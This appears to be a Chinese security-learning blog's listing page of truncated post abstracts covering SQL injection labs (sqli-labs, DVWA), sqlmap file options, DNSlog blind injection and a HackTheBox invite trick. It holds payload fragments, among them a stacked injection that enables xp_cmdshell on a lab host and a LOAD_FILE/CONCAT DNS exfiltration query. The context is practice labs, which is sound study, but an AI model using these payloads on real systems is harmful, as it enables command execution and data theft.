bonga

该文被密码保护。 阅读全文

摘要： mongodb命令删除文档，db.集合名.remove({键：值})更新文档，db.集合名.update({被更新的对象}，｛$set:{要更新的内容}｝)，默认只更新检测到的第一条文档更新全部匹配到的文档，db.集合名.update({被更新的对象},{$set:{更新的内容}},｛multi : 阅读全文

摘要： 一、快速获取邀请码方法 1，使用curl请求下面的地址curl -X POST https://www.hackthebox.eu/api/invite/generate 2，在返回结果的code部分使用base64解密获取邀请码echo '获取到的code值' |base64 -d，就可以解密出邀 阅读全文

摘要： 使用xp_cmdshell需要堆叠注入，http://192.168.190.148/less-1.asp?id=1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 阅读全文

摘要： 转自：https://www.zzhsec.com/255.html 1.更换源【使用中科大或者官方源都可以】 下面使用中科大的源 2.添加完毕后执行下面的更新指令，进行系统或者工具的更新 这里解释一下： apt-get update //刷新源，获得最近的软件包的列表 apt-get upgrad 阅读全文

摘要： sqlmap参数--file-read,从数据库服务器中读取文件--file-write,--file-dest，把文件上传到数据库服务器中 dnslog平台的学习和它在盲注中的应用1，判断注入点2,测试网站对DNSlog提供的url是否解析SELECT LOAD_FILE(CONCAT('\\\\ 阅读全文

摘要： sqlmap工具的使用sql注入工具，明小子，啊D，萝卜头，穿山甲，sqlmap等开源自动化注入利用工具，支持的数据库有12种，在/plugins中可以看到支持的数据库种类，在所有注入利用工具中是最好用的支持的注入类型，bool,时间，报错，联合，堆查询，内联，可以获取用户名，密码，权限，角色，数据 阅读全文

摘要： less19基于错误_POST_Referer_请求头注入 查看关键源码，跟18关不一样的只是，回显的是Referer不是User-Agent，判断INSERT语句结构：INSERT INTO table_name ('referer','ip_address') VALUES ('$referer 阅读全文

摘要： 伪静态1，需要开启站点的重写机制，需要修改配httpd配置文件，将LoadModule rewrite_module modules/mod_rewrite.so注释取消，需要apache支持解析.htaccess文件，找到 AllowOverride None修改为 AllowOverride A 阅读全文

摘要： VWA的Medium和Hight级别sql注入 一，Medium级 服务端代码 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysql_real_escape_string( $ 阅读全文